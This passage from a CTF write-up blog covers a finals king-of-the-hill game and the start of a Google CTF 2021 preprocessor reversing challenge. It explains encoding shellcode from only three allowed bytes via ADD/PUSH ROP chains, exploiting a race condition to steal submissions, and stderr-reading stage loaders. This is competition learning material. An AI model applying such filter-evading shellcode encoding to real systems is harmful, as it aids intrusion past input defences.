However, one big downside of this was that, if any team were to analyze the graffiti logs manually, they would soon discover what’s going on and correspond our fake IP back to the real IP, because they share the same prefix. Nonetheless, this was the best we could do.

The Accusation

Our connection to the game VPN is shut off by the admin, said we had too many traffic going through the network and we were DOSing the server. After spending sometime figuring out where the traffic was coming from, we realized that we had our accusing script acting way to aggressive, so we had to take that down for a moment.

@mcfx moved the accusing script locally and only periodically pulled data from the remote server. He then analyzed data all by himself, and write a script to automatically correspond jump server IPs back to the real IP. He was able to figure out all the big player’s real IP and their jump servers’. I believe he was the sole reason why PPP and Katzebin lost so many points.

There were many ways to find the real IP behind the jump server, although I’m not sure what exact method @mcfx used. Nonetheless, I’ll talk about what my idea was:

Assuming we had an IP that we didn’t know the real IP behind it, we could set up a list of all possible real IPs behind it. For the first time we met this IP, the list is just all other teams’ IP addresses. Then, for all the graffiti that were sent out using that IP, we could try to accuse that graffiti with one of the IP address that’s still on the list. Since the /accuse endpoint told us we didn’t successfully accuse, we cross out that IP from the list, until we met with one IP that we accused successfully.

During the game, I had a real evil thought: How about we tell other teams what is the real IP address behind each jump server, so that they could help with accusing the big teams and taking them down. Maybe I could publicize it in the Discord chat or spray it onto other teams’ walls. However, that would probably be violating some rules, or at least not so moral, and didn’t sound like a correct thing to do, so we didn’t do it.

The Avoidance

After some period of time, we could see our point no longer grew that rapidly, so it must be some teams starting to find out our fake IP address and accusing us with the real ones. Utilizing the rules that you can only accuse graffiti that were sprayed on your team’s wall, we had two ideas:

Spray randomly to only a portion to all the teams and record who did we spray. We can then check our scores to find out who should we stop spraying.
Only stop spraying the big players we found, since they have the largest chance of finding out our real IP as well.

The first one seemed to be a good idea, but really hard to implement. First of all, the scores are lagging behind, so in reality we would have to wait for a lot of rounds to get the data we need. Furthermore, the data is really noisy, and we have to do this for many rounds to be sure. Therefore, I didn’t go with it.

Instead, for the second idea, since we already identified some of the big players out there, we could just stop spraying them and quickly check if we indeed get more points. We picked out two largest teams out there (who owned the most jump servers), who had real IP 13.37.109.64 and 13.37.238.64, and stopped spraying them.

At first it didn’t seem to work, but after the scoreboard kept up with the round where we implemented this idea, we saw our score increased drastically, and the score we gain each round then surpassed PPP and Katzebin.

The Countermeasure

After a while, we realized that the big teams stopped attacking us as well. Probably due to the same thought process as above. However, there is actually a way to counter that, let’s first review what we knew:

In order to successful accuse some team, we needed to present an (IP, graffiti) pair, with restriction being that

We knew the real IP address of the WWW game box, which the team that exchanged this graffiti owned.
That graffiti was sprayed onto our wall.

If people stop spraying us, then clearly we couldn’t do anything about it, right?

Notice one thing, that we could see other teams’ wall as well. Meaning even if at some round some team doesn’t spray us, they would spray someone else and their graffiti would be left there for anyone to see.

Then, one of our team members had a crazy thought: we could take the graffiti that the team sprayed on other teams’ walls and spray them onto ours wall. This idea had two implications:

This must be counted a point for that team, because the system had no way to tell weather we sprayed it onto our own wall or the other team took control over our machine and sprayed a graffiti onto ours.
Since 1 must work, then we definitely can successfully accuse that team for spraying, because it satisfies the above 2 restrictions.

Quickly we tried out if this really works, and it did. Hence, for teams that don’t want to get accused, the best thing for them to do is to probably stop spraying. At the final hours of the game, both PPP and Katzebin stopped spraying, and we were the only team who still has a growing score.

The Reset

At one point of the game, we suddenly lost all connections to the game box. At first we thought it was just a connection issue, so we waited a bit, but it didn’t come back on its own. I started to panic, because all of the saved flags are stored on the server, and we had to at least get the file back before resetting the machine. So we sent out a ticket, hoping that the admin could help us sort out the issue.

However, waiting for almost 10 minutes after we lost connection to the server, there were still no progress on the matter, and we can’t afford to lose more points. We have accumulated about 40 flags at this time of the game, and a reset means we would have to start from zero.

Just when we were stressed about whether to wait for admin’s support or just reset the machine, one of the team members found the content of the flags file in his terminal history, a cat /flags command that might just save us. After checking the content, we confirmed that it’s a relative recent history, which contains enough flags for us to get back to where we were. We backed up that content and immediately reset our machine.

But that’s not the end.

The Second Reset

When we first lost connections to the server, we were kind of suspecting that another team hacked our box, but we didn’t know. We knew that there were SSH weak password issues, but we weren’t able to log into anyone’s machine using that weak password, and we had changed our SSH password from the beginning.

However, not long after we reset our machine, suddenly we were kicked out from the server again. This time, it’s not that we cannot connect to the SSH port, but SSH server kept telling us the password is wrong. We were sure that we were getting hacked and that was really scary.

Quickly we reset our machine again, and on the moment we log in, not only we changed all the users’ passwords, including the main one, we also disabled the apache server. Although this might make us fail the service availability check, but it’s only 15 points per round, and the amount of scores we get is much more than that.

After that, our connections are fine, so that’s the end of the this brief interlude.

The End

An hour before day two ended, almost everyone’s score stopped increasing, except for ours. At the end, we even climbed to the second place, only 2000 scores left with PPP. I would say that’s impressive considering we didn’t pwn any server at all.

There’s also one point in the game where nobody scored for some reason. I think that’s because the /graffiti_store endpoint is down, but I don’t think it was down for that much time. It remains to be a mystery then.

shooow-your-shell

After day two ended, a KoH homework was released. The name was shooow-your-shell and obviously from the name it was yet another shellcode challenge. Nine hours before day three started, we began to work on this challenge.

Looking at the Python code and disassembled runner, we understood how the game worked:

Each time a team can submit a hex-encoded shellcode. The shellcode can be written in x86_64, arm64 or riscv64 architecture.
The game will try the shellcode on three architectures each time, and if any of them reads the file content from /secret and print the content to stdout, it was deemed as a success.
The shellcode is executed using qemu-user-static, but chroot into a temporary folder and executed using a non-root user privilege.
However, there are some restrictions about the shellcode a team can submit:
- At any time of the game, there would be a set of blocked bytes $B\subseteq \{\texttt{0x00},\texttt{0x01},\cdots,\texttt{0xFF}\}$. The submitted shellcode cannot contain any of the blocked bytes.
- Comparing to the last accepted submission $S_l$, the new shellcode $S_n$ must be either:
  - $\{S_l\dots\} \setminus \{S_n\dots\} \neq \varnothing$ (the new shellcode did not use at least one byte the last accepted shellcode used), or
  - $\vert S_l\vert > \vert S_n\vert$ (the new shellcode is shorter than the last accepted shellcode in length).
  Where $S_l$ and $S_n$ are both strings of shellcodes, and $\{S\dots\}$ is a set containing bytes used in a shellcode $S$.
If the shellcode was then accepted, the newly blocked bytes will be $B_n = B \cup \left(\{S_l\dots\} \setminus \{S_n\dots\}\right)$. That is, all bytes that’s not used by the new shellcode but used by the old one will be accepted.
The team with the latest accepted shellcode would be viewed as “the top of the hill.” The team cannot submit more shellcode if they were the top of the hill.
The newly accepted shellcode would then be appended into history, where the leaderboard is calculated as a reverse of the history. That is, the team with the latest accepted shellcode would be #1, the team that took the top of the hill before them would be #2, so on and so forth.
Each time the Python script would read past information from history, and write to it if the shellcode is accepted.
If a team stayed on the top of the hill for more than 900 seconds (or 15 minutes), then that team would be regarded as a “winner,” and the game would reset. However, one random byte of the winner’s shellcode would be part of the new game’s initial banned bytes $B$. This applied to all past winners.

The rules are pretty clear, but we also had some doubts:

The history file was read at the start of the script, and would be overwritten when the new history was saved, so there were clearly a race condition: open two connections $A$ and $B$ at the same time, submit an acceptable shellcode to $A$ such that the history is overwritten. However, because the script reads history at the start of the script, so for $B$ the history is still what it used to be (when the connection opened), and accepts a shellcode that may not be acceptable for the current history. If now we submit a shellcode to $B$ and it is accepted, $B$’s connection would overwrite history again as if $A$ never happened.
There must be a way to sync up the files between each team’s boxes, or everyone would be seeing there own version of history and there’s no point of the game anymore. There’s also one possibility that everyone is playing on the same server, but that’s highly unlikely according to @riatre.

But there’s no way to know before the game started, so we went on with our preparation.

Preparation

We first started by writing a few different shellcodes. There were shellcodes that used syscalls directly, shellcodes that called functions statically linked into the binary, and shellcodes that pushed a ROP chain into the stack and returns. Nothing quite out of ordinary here.

Three-Byte Shellcode

Until @meowmere sent a shellcode that blew all of us away. In his shellcode, there were only 3 bytes used, 0x05, 0x50, and 0xc3. Quickly we disassembled the shellcode and understood how it worked:

The shellcode was simply pushing a ROP chain onto the stack and returning, but written in a way such that all the values were added up in the register. Therefore there are only three basic instructions used

add eax, imm32, which is 0x05 followed by four bytes of the immediate value in four bytes.
push rax, which is 0x50, and
ret which is 0xc3.

And for the add instruction, the immediate values were consisted of only these 3 bytes, so the shellcode only used these three bytes. Of course the values in the ROP chain contains bytes that doesn’t fall into these 3 bytes, but amazingly, using a combination of number that made up from these 3 bytes and modular arithmetic (which every computer comes with), we can actually add them up to the number we want.

For example, if we want a number 0xd093cffa to be pushed onto the stack, then we can have:

add eax, 0xc350c305
add eax, 0xc350c305
add eax, 0xc350c350
add eax, 0xc350c350
add eax, 0xc350c350
push eax

And the assembled shellcode for this would consist only of the aforementioned 3 bytes. This works because

\[(\text{c350c305})_{\text{hex}} \cdot 2 + (\text{c350c350})_{\text{hex}} \cdot 3 \equiv (\text{d093cffa})_\text{hex} \mod 2^{32}\]

I’m not good at number theory, so I can’t tell if the combination of these 3 bytes into a 32-bit number can add up to any number within the 32-bit range if mod $2^{32}$. That being said, it is proven that it can add up to some number, so it’s time for some math.

Find Values that Adds Up to the Target One

We have an alphabet $A$ that consists of numbers from $[0,\vert A \vert)$, a set of usable symbols $B \subseteq A$, and a target string $T$ of length $s$. We represent $T$ as a base-$\vert A\vert$ number, that is, $T = \sum_{i=0}^{s-1} {\vert A\vert }^{i} T_i$.

We want to find a list of numbers $[n_1, n_2, \cdots, n_i]$ such that $T \equiv \sum_i n_i \mod \vert A\vert ^s$ and $n_i=\sum_{j=0}^{s-1} \vert A\vert ^{j}\cdot n_{ij}, n_{ij} \in B$, i.e. $n_i$ consists only symbols from $B$ in their base-$\vert A\vert$ representation as a string.

Although it is possible to generate all possible values of $n_i$—such a set has a size of $\vert B\vert ^s$—it is very hard to find a combination of them that adds up to $T$. If using breadth-first search, on the search depth $d$, there will have $O\left(\vert B\vert ^{sd}\right)$ such many values, and there could be as many as $\vert A\vert ^s$ of different combinations and only few of them is what we need. Therefore, we need to find a way to search for these values quickly.

We have

\[\begin{align} T &\equiv \sum_i n_i &\mod |A|^s\\ &\equiv \sum_i\sum_{j=0}^{s-1} |A|^j\cdot n_{ij} &\mod |A|^s\\ &\equiv \sum_{j=0}^{s-1} \left(|A|^j \cdot \sum_{k=1}^{|B|} b_k c_{jk} \right)&\mod |A|^s&& \text{where }c_{jk} = \sum_i[n_{ij} = b_k]\\ \end{align}\]

where $n_{ij}$ is the $j$ the symbol of string $n_i$. A constraint we must add is

\[\exists i \in \mathbb{Z}^+, \forall j \in [0, s), \sum_{k=1}^{|B|} c_{jk} = i\]

That is, we must have the same number of symbols on each position on the string, otherwise we must use $0$ to pad the string which might not be in $B$. To find the optimal answer (one that produces shortest $n_i$ list), we just need to find such a minimum $i$. Also, it is easy to see that $i$ has an upper bound of $\vert A\vert \cdot \vert B\vert$, since each symbol on each position need only appear at most $\vert A\vert$ times.

Notice that we represented $T$ as a number, that is:

\[T =\sum_{j=0}^{s-1}|A|^j \cdot T_j \equiv\sum_{j=0}^{s-1} \left(|A|^j \cdot \sum_{k=1}^{|B|} b_k c_{jk} \right)\mod |A|^s\]

where $T_j \in A$. That means we have

\[\begin{align} T_0 &\equiv\sum_{k=1}^{|B|} b_k c_{0k} &\mod |A|\\ T_1 &\equiv \sum_{k=1}^{|B|} b_k c_{1k} + \left\lfloor\frac{\sum_{k=1}^{|B|} b_k c_{0k}}{|A|}\right\rfloor&\mod |A|\\ T_2 &\equiv \sum_{k=1}^{|B|} b_k c_{2k} + \left\lfloor\frac{\sum_{k=1}^{|B|} b_k c_{0k}}{|A|^2} \right\rfloor + \left\lfloor\frac{\sum_{k=1}^{|B|} b_k c_{1k}}{|A|}\right\rfloor&\mod |A|\\ \dots\\ T_d &\equiv \sum_{p=0}^d \left\lfloor \frac{\sum_{k=1}^{|B|} b_k c_{pk}}{|A|^p} \right\rfloor &\mod |A| \end{align}\]

Now we have turned the task from brute-forcing a list of $n_i$s into brute-forcing $c_{jk}$s. For each byte of $T$, we have at most $\vert A\vert ^{\vert B\vert }$ different combination of $\sum_{k=1}^{\vert B\vert } b_k c_{jk} \mod \vert A\vert$, and assuming they distributes evenly over the range, there are $\approx \vert A\vert ^{\vert B\vert -1}$ ways that they sums up to be any specific symbol, which makes the search space much more acceptable when $\vert B\vert$ is small. Furthermore, we can cache all values that different $\sum_{k=1}^{\vert B\vert } b_k c_{jk} \mod \vert A\vert$ has, such that we can quickly lookup the value in reverse. The overall search complexity is $O\left(s\cdot\vert A\vert ^{\vert B\vert -1}\right)$ (a very loose bound).

The pseudocode for the above procedure, without optimization:

input Target, UsableSymbols, Alphabet
a := size(Alphabet)
b := size(UsableSymbols)

def Search(T, i, depth, path)
  if depth == length(Target)
    return path
  end
  for each (c_1, c_2, ..., c_b) such that
      sum(c_1, ...) == i and
      ({c_1, ...} <dot product> UsableSymbols) mod b == T mod b
    answer := Search((T - {c_1, ...} dot UsableSymbols) mod b / a, i, depth + 1, append(path, (c_1, ...)))
    return answer if not nil
  end
  return nil
end

for i from 1 to a * b
  answer = Search(Target, i, 0, [])
  return answer if not nil
end
output "no answer"

In this specific case, our alphabet are possible hex values within a byte, i.e. 0x00, 0x01, …, 0xff, so 256 of them. And our usable symbols depend on what operations we need to do. In this case of add eax, push rax and ret, our usable bytes are 0x05, 0x50, and 0xc3 respectively. Therefore, using this algorithm, given a number $T$ within the range of $2^{32} = 256^4$, we are able to find a way to build a minimal list of numbers such that they sum up to be the target number and they only contain 0x05, 0x50, and 0xc3 in their 4-byte hex representation. Let $f(T)$ be such the optimal (minimal) size of the list for a given $T$.

Here’s my script for adding values consist of limited bytes to a target number using modular arithmetic (github.com).

Construct an ADD/PUSH ROP Chain

For a normal hand-written ROP chain, the values on stack are fixed. However, in a binary executable, there actually could have multiple occurrence of the same instruction like pop rax; ret or mov dword ptr [rdi], edx; ret. It is the same to use any of the address that contains our wanted instruction in an ROP chain, but since our target now is to minimize the length of converted ROP chain, we can look for an optimal combination of values such that they produce the shortest ROP chain after converting them to the add/push format.

Notice that the current rax value is dependent on the last value, for example, our shellcode looks like this:

# rax = 0
add rax, 0x50505050
add rax, 0x50505050
...
push rax # rax = v1
...      # somehow add v2 - v1 to rax
push rax # rax = v2

The add operations between the first push and second push depends on both values of $v1$ and $v2$. Let’s make this more formal:

Given a ROP chain of $n$ values that need to be pushed onto the stack, we have a list of sets $N = \left[V_1, V_2, \cdots, V_n\right]$ where $V_i$ is a set of values that, no matter which being pushed onto the stack, the ROP chain has the same effect. We want to find a solution $(v_1, v_2, \cdots, v_n) \in V_1 \times V_2 \times \cdots \times V_n$ such that

\[\sum_{i=1}^n f\left(v_i - v_{i-1} \mod |A|^s\right)\]

is minimal (where $v_0$ is the initial rax value). A brute-force method such as going through all such possible $n$s is not ideal, which requires $\prod_{i=1}^n \vert S_i\vert$ such many tries. A greedy approach trying to minify $f\left(v_i - v_{i-1} \mod \vert A\vert ^s\right)$ going through each $i$ is clearly not optimal. It’s time for dynamic programming then.

Let $F_i(v)$ be the minimal number of add instructions when the $i$th value on the stack is $v$, We have

\[\begin{align} F_{i+1}(v) &= \min_{(v_1, \cdots, v_i) \in V_1 \times \cdots \times V_i} \left( f\left(v -v_{i} \mod |A|^s\right) + \sum_{j=1}^{i} f\left(v_{j} - v_{j-1} \mod |A|^s\right)\right)\\ &= \min_{v_i \in V_i} \left(f\left(v -v_{i} \mod |A|^s\right) + \min_{(v_1, \cdots, v_{i-1}) \in V_1 \times \cdots \times V_{i-1}} \left( f\left(v_i-v_{i-1} \mod |A|^s\right) + \sum_{j=1}^{i-1} f\left(v_{j} - v_{j-1} \mod |A|^s\right)\right)\right)\\ &= \min_{v_i \in V_i} \left( f\left(v -v_{i} \mod |A|^s\right) + F_i(v_i)\right) \end{align}\]

And our final answer is to look for $\min_{v_n \in V_n} F_n(v_n)$. The time complexity of this DP is

\[\Theta\left(\sum_{i=1}^n \left(\sum_{(v_i, v_{i-1}) \in V_i \times V_{i-1}} f^t\left(v_i - v_{i-1} \mod |A|^s\right)\right)\right)\]

where $f^t(v)$ is the time needed for the $f$ algorithm to run on input $v$.

Therefore, using this strategy, we were able to generate a three-byte shellcode that has the minimal length. That’s not the end. We are well known the rules that a winner’s shellcode would be banned, so there are some alternatives to the method:

If 0x05 is banned, we could use 0x2d (sub eax) or 0x15 (adc eax). Although the analysis above would be a bit different.
If 0x50 is banned, we could use 0x81 0xc3 (add ebx) and 0x53 (push ebx).
If 0xc3 is banned, we could use 0xc2, since ret 0 is the same as ret.
- If 0xc2 is banned, we could use 0xff 0xe0 (jmp eax).

And for all the above, we could replace the register rax with any other register and the method should still work. Also, this analysis applies for a four-byte set as well.

Phishing Strategy

It all sounds fun and games, until you remembered that the rule said any shellcode that doesn’t use one of the bytes the current top-of-the-hill shellcode had could be accepted. So everything we’ve been doing is in vain!?

Well, if we could ban every single byte except for these three bytes, then obviously we could take the top of the hill and win without a doubt. However, we couldn’t submit again if we were at top of the hill, so it’s nearly impossible to ban the bytes we want to ban. Or was it?

The first idea came to mind was to collude with some other team. If another team could submit a shellcode that uses all the bytes, then our three-byte shellcode would wipe every other bytes out. However, letting alone the potential rules that would break, it’s clear that no team would collaborate with us on this.

Then a thought came through my mind: it is totally possible for us to ban all the other bytes without anyone’s cooperation—the other teams would be helping us no matter they want to or not—it’s time for phishing!

The idea was dead simple:

We prepare a few shellcode that use as few number of different bytes as possible. The shellcodes CANNOT contain the three bytes we need to use. The used bytes in these shellcodes should overlap each other as little as possible.
At each round, we check the current banned bytes, and pick the shellcode that does not contain the banned bytes out. Then, append all other bytes to the end of the shellcode, but don’t include the banned ones. For the three-bytes we need, there are two cases:
- If the current top-of-the-hill shellcode include that byte, then also append that byte to the end,
- Otherwise, don’t include that byte in our submitted shellcode.
Once we submitted that shellcode, we’ll just have to wait for another team to submit whatever shellcode they have, and then submit our three-byte shellcode. Then, all the other bytes should be banned except for those three bytes we used.

Of course, if one of our three bytes was already banned, then this couldn’t work. But overall this seemed like a really good strategy. It’s almost like phishing because it would result in other teams submitting shellcode that is actually used against them, while they had no idea what happened.

As for how it really went in the real game, I’ll leave to a later part.

Copying Homework

Recall the race condition we talked about earlier, so another group of our KoH players were thinking about how to exploit it. The game also features an in-game leaderboard, where everyone can see each other’s accepted shellcode. We then had a great idea of how to utilize this race condition and the leaderboard:

Start two threads that connects to the game service simultaneously, so they would have the same view of the history.
Thread 1 keeps the connection alive, while thread 2 constantly reconnect to check if there’s a change in leaderboard.
If thread 2 detected a new top-of-the-hill shellcode, it send that shellcode to thread 1.
Thread 1 then wait until seconds before the timeout of the connection (30 seconds), and submit that shellcode.

A diagram looks like this:

This would work because Thread 1 had an old view of history, so if team B’s shellcode could be accepted for that version of history, then definitely we could use the same shellcode as well. This would also wipe Team A’s submission out of existence. A really powerful strategy indeed.

Countermeasure

The way to counter this (of course there is one), is that for the submitting team, they had to do exactly the same thing.

Although we didn’t quite think of this during the preparation, for the sake of consistency, I’ll put it here.

When submitting a new shellcode, the team had to open two connections, one submitting shellcode immediately, and another should wait until the timeout to submit. This would work because:

Suppose another team A who’s trying to steal the shellcode opens a connection at $t_0$. So for that team, the shellcode it can steal is submitted in the time range $(t_0, t_0+t_{\text{close}}]$ where $t_{\text{close}}$ is the connection timeout. Suppose we submit our shellcode at $t_1$, where $t_1 \in (t_0, t_0+t_\text{close}]$, then the best they can do is to resubmit the shellcode at time $t_0+t_\text{close}$. However, we then resubmit our shellcode at $t_1+t_\text{close}$, so our record will still be on the leaderboard. Notice that no matter how close $t_0$ and $t_1$ can be, since $t_0 < t_1$ because the stealing team must read history before our submission, it must be $t_0+t_\text{close}< t_1+t_\text{close}$.

Therefore as long as we submitted our shellcode twice using the strategy, we could make sure that our shellcode wouldn’t be stolen.

Some Other Methods

A Repository of Shellcodes

We also put all of the possible shellcodes into a git repository, and we wrote a script to pick the shellcodes from the repository to submit with some rules and heuristics:

First we cross out of the shellcodes that couldn’t possibly be accepted either because of banned bytes or they weren’t better than the current top-of-the-hill.
Then for each of the remaining shellcode, we pick the one that if accepted, would ban most number of bytes.
In case of a draw, we submit the shellcode that’s shortest in length.

Any shellcode we encounter during the game would also be added into this repository.

Fuzzing

Remembered the fuzzing we talked about in zero-is-you? Now it’s back. I didn’t work on this so I know not much about the details, but essentially it would take the current top-of-the-hill and try to fuzz out a shellcode that is shorter than the current one.

Using Existing Tools

There were clearly CTFs before that required inputting shellcode using only printable characters, so definitely there were existing tools to generate/transform shellcodes into limited character set. We found some of the tools and they really worked pretty well.

Game Start

Game started, the phishing strategy worked right away and we blocked all the bytes, just to see that the history was rewritten by some other teams. At that time we didn’t figure out the countermeasure yet, so that’s that. Nonetheless, copying homework did work and we were on the top-of-the-hill for a moment.

We didn’t plan to use the 3-byte strategy until we get a reasonable large banned bytes set. However, one thing we missed is that we put our 3-byte shellcode into the repository as well, so the script automatically submitted that. Oh well, that’s bad. Not only our trump card was leaked and everyone could figure out how this worked, but we submitted when there were still a lot of acceptable bytes, so anyone could take us down with an easy shellcode.

Furthermore, it’s obvious that we were the only ones figured out how to use only a 3-byte set (not exactly, more on that later) to construct a shellcode, but everyone noticed the race condition and started to copy each other’s homework. It’s really sad to see we submitted a shellcode, just a few seconds later we disappeared from the leaderboard and being replaced by some other team with the same shellcode.

That being said, the game was fair to everyone, we indeed successfully copied others’ homework as well, so no real complains here.

Unexpected Reset

We were the winner for the first round, everything was going smoothly, until it wasn’t.

On the start of the second round, it all seemed normal as teams submitting different shellcode again, but then, out of nowhere, a reset happened. It was not a reset as if someone became a winner again, it was a reset as if the entire history was wiped out. We can tell because we were no longer under the Renowned ancestors section. We thought maybe it was a sync issue, that there were some problems with the sync script that messed everything up. But the weirdest thing is yet to come.

StarBugs’s true 3-byte shellcode blew our mind. 69 89 73 was immediately the meme in the Discord server. There was no way, we thought, that this short of a shellcode would do the things the game asked us to do. We were certain that, either the syncing script messed something up, or it cut off a part of the shellcode away.

However, OOO said that “the sync bot [was] working just fine,” so it made me think it might be another possibility: they must had some Linux kernel chroot escape zero-day, or else how did you explain the situation?

Anyway, 698973 didn’t stay on the top for a long time, because there were still plenty of acceptable bytes to use, so other team’s were able to use the remaining bytes to write something and kicked StarBugs out. It might be a fluke then, we thought, so we quickly went back to the battlefield.

Read From Stderr

It was all going pretty normal for a few rounds, but something weird happened again. This time, PPP threw out 000000ca00080091210000d4, and we were all like, what? Soon enough, 698973 came back, and 699973 appeared. We were all dumbstruck. A quick run of the code on our local environment showed clearly that these shellcode doesn’t pass the test, so what trickery were they playing with?

Not before long, my teammate noticed something odd. If you run these shellcodes, the execution would actually take longer for some reason. It would stuck at one architecture and then timed out after 5 seconds. That’s a bit weird. Then, we noticed that if you were to press Enter, the shellcode would exit immediately. This was a sign of accepting input!

The questions were then, what was the input format and why can you input something. The second one isn’t hard to figure out, as we finally saw that in subprocess execution, the stderr was redirected as 1, but you could actually read data from that. This is really wild but not something we haven’t seen before.

While some were investigating how the shellcode itself worked, we took an educated guess that it just accepted raw shellcode. So quickly we wrote a shellcode using that architecture, input it when the shellcode waited for input, and it really did work.

After that and some digging into RISC V and ARM64 architecture specifications, we figured out how the shellcode could read from input while only had 3 bytes.

I wasn’t focused on this so I didn’t know how it actually worked. The reader can refer to some other fantastic write-ups.

Phishing Worked

An hour or so before the game end, finally the phishing worked and the accepted bytes was limited to only 3 bytes. We were so happy, just to found out that someone copied our homework.

That’s a really bad news because we were too naïve and submitted our optimal solutions already. Ends up that we have to look for another set of ROP chain that would result in a shorter shellcode after converting it into an ADD/PUSH ROP chain.

After a few minutes, we found one, and we were really excited, so someone just submitted the shellcode by hand. And you know what happened? Our homework was being copied once again. Oh big F.

Finally we found another one, and this time we took our lesson. We finally figured out the countermeasure (mentioned above), and submitted it the right way. We then start our 15 minutes countdown, while preparing for the next three-bytes payload.

However, an unexpected reset happened once again before we reached 15 minutes, and we didn’t even have enough time to start running our phishing script. Welp, that’s the end for phishing I guess.

To the End

It was then basically a battle for the shellcode that read from stderr. Since we figured out how it worked, we used this technique as well. At the end, PPP throw out the final bomb, shellcode 73 00, marking probability the shortest shellcode that could be accepted.

Still we didn’t figure out why the unexpected resets happened. Was it some other teams’ doing things to alter history, or just a bad sync script made by OOO. Probably we could figure it out by digging into the pcaps, but I’ll leave that to the reader.

Epilogue

Writing this took way longer than I planned, but I’m glad I had most of the details laid out, as a memorial to this precious experience. I genuinely had a lot of fun playing with Tea Deliverers, hope they will still bring me in next year.

Finally, here’s an overall ranking for KoH:

Thank you for reading!

Google CTF 2021

2021-07-19T07:40:00-04:00

This weekend I was planning to play The Great Ace Attorney: Adventures with my SO.

Yet here I am, and she was pretty angry about that.

CPP

So CPP stands for C Pre-Processor, clearly seen from the compiler’s warning message -Wcpp.

Eyeballing the Code

Open the file we see a bunch of pre-processing macros. In fact, most of the code are macros, and if we scroll to the bottom we can see a tiny bit of actual C code that will compile if the pre-processing passed without errors.

It is pretty obvious that we need to somehow figure out the running process of the pre-processor, and the flag we are looking for is hidden within.

Going back to the top of the file (line 16), we first see a list of definition of flag characters from FLAG_0 to FLAG_26, in total of 27 characters. It’s then followed by a list of definition of characters used in the flag string (line 45), which includes all 26 English letters, in both lowercase and uppercase, and 10 numeral digits, plus underscore _ and brackets { and }, all defined to be their ASCII values. In total we have 65 characters possibly be used in the flag string. The number of combinations for all possible flags is $65^{27}$, which is apparently impossible to brute-force.

The next section is a list of definitions (line 111), including a variable S and bunch of variables starts with ROM_. Without any further context, we can assume that this is the part where the memory is defined for this program, where ROM_xxxxxxxx_y means the yth bit of the address 0bxxxxxxxx. The pre-defined memory values lies within the range of 0b00000000 - 0b01111111 (0x0 - 0x7F), and the flag string is stored in 0b10000000 - 0b10011010 (0x80 - 0x9A).

It is also from this part (line 840) we can tell that our assumption above is correct. Furthermore, we can see that the 0th bit of each address in ROM is the least-significant bit, and the 7th is the most-significant one. A code snippet like this

#if FLAG_0 & (1<<2)
#define ROM_10000000_2 1
#else
#define ROM_10000000_2 0
#endif

checks the second bit of FLAG_0 and store the value into ROM_10000000_2.

The next five lines (line 1920-1924) defines some macro functions. We can see that function LD(x, y) is the same as ROM_x_y, meaning that this LD loads the yth bit from address x in ROM. The function MA(l0, l1, l2, l3, l4, l5, l6, l7) concatenates bit l0 to l7 together, but in reverse order, meaning MA(1, 1, 1, 1, 0, 0, 0, 1) will give out string 10001111. Here, we can’t be sure that l0 to l7 are 0, 1 values only yet, but it will become apparent in the following analysis. The final macro l is simply a short hand to the above MA function called on l0 to l7.

Code Formatting

The next part starting from line 1926 is very messy, mainly there’re a lot of #if... instructions without proper indentation, make it really hard to read. We wrote a easy formatter:

with open('cpp.c', 'r') as in_file, \
     open('cpp.formatted.c', 'w') as out_file:
    indent = ''
    for line in in_file:
        if line.startswith('#if'):
            print(indent + line, end='', file=out_file)
            indent += '  '
        elif line.startswith('#else'):
            print(indent[:-2] + line, end='', file=out_file)
        else:
            if line.startswith('#endif'):
                indent = indent[:-2]
            print(indent + line, end='', file=out_file)

The end result looks like this

#if S == 3
  #undef S
  #define S 4
  #undef c
  #ifndef R0
    #ifndef Z0
      #ifdef c
        #define R0
        #undef c
      #endif
    #else
      #ifndef c
        #define R0
[...]

Which is much more intelligible.

Structure Overview

This above part looks like the main program, so we’ll skip it for now. Jumping all the way to the bottom (line 6217), we see that the code includes itself twice if S != -1. We also see that there’s a pre-defined macro __INCLUDE_LEVEL__ used. It is a macro that starts at 0, and increase by 1 for each level an #include is expanded. This means the code expands differently at different include level.

Overall structure of the file can be seen as:

if (__INCLUDE_LEVEL__ == 0) {
  flag_str := "CTF{write_flag_here_please}"

  /* define character ascii value */
  
  MEMORY[0x0 - 0x7F] := {...}
  
  copy(&MEMORY[0x80], flag_str)
}

if (__INCLUDE_LEVEL__ > 12) {
  // main program
} else {
  if (S != -1) {
  	#include self
  }
  if (S != -1) {
  	#include self
  }
}

Reversing the Program

For the main program (line 1927 - 6215), we can see a pattern that looks like this:

#if S == [x]
  #undef S
  #define S [x+1]
  [...]
#endif
#if S == [x+1]
  #undef S
  #define S [x+2]
[...]

where x ranges from 0 to 58. Experiences tell us that S should be the instruction pointer, and it by defaults go to the next one. However, the preprocessor only goes in one direction, so how does this program jmp? Or in other words, what happens if the program #define S [x] where x is less than the current S value?

This is where that two #include comes into play. The code include itself twice when __INCLUDE_LEVEL__ is less than 12 and S != -1. From there we know two things,

Program ends when S, the instruction pointer, == -1
The program jmp by setting S and executes the corresponding instruction in the next #include part of the same code, if the new S is less than the current S.

Since S’s initial value is 0, we followed the execution path and tried to manually figure out what each instruction means:

S == 0: A single #define S 24 means JMP 24.
S == 24: What’s going on? Why there’s a lot of #undef?

S == 30

Ignoring the confusion, I followed the path all the way to S == 30 and see a humongous body for this line of instruction.

I originally thought this was somehow a form of obfuscation, so I wrote a static analyzer for this program and see if I can rip away some of the things. Spent a lot of time on this, later realizing it was heading towards a wrong direction.

We see something look like this:

#ifndef Bx
  #ifndef Ix
    #ifdef c
      #define Bx
      #undef c
    #endif
  #else
    #ifndef c
      #define Bx
      #undef c
    #endif
  #endif
#else
  #ifndef Ix
    #ifdef c
      #undef Bx
      #define c
    #endif
  #else
    #ifndef c
      #undef Bx
      #define c
    #endif
  #endif
#endif

for x ranging 0 to 7. Let’s make it clearer by constructing a table:

Bx	Ix	c	Bx_after	c_after
N	N	N	N	N
N	N	Y	Y	N
N	Y	N	Y	N
N	Y	Y	N	Y
Y	N	N	Y	N
Y	N	Y	N	Y
Y	Y	N	N	Y
Y	Y	Y	Y	Y

Where N means that the variable is undefined and Y means it is defined. Bx_after is the result of Bx after running this instruction. Notice that 4 rows are marked bold for Bx_after and c_after, meaning their value changed. For all other initial value of Bx, Ix and c, they matched none of the branches, so their value doesn’t change.

It is then clear that this is B += I in binary, where c is the carry bit. The only part that is confusing is actually how a bit is represented.

#define and #undef a Bit

When we first analyze this code, all values are set using #define [variable] [value]. This applies to the flag value, the MEM section and S the instruction pointer. However, things changed a bit in the main program. Here, a bit is set or unset using #define and #undef, and checked using #ifdef and #ifndef respectively—the existence of the macro defines if the bit is 1 or 0. So, for a code snippet like this:

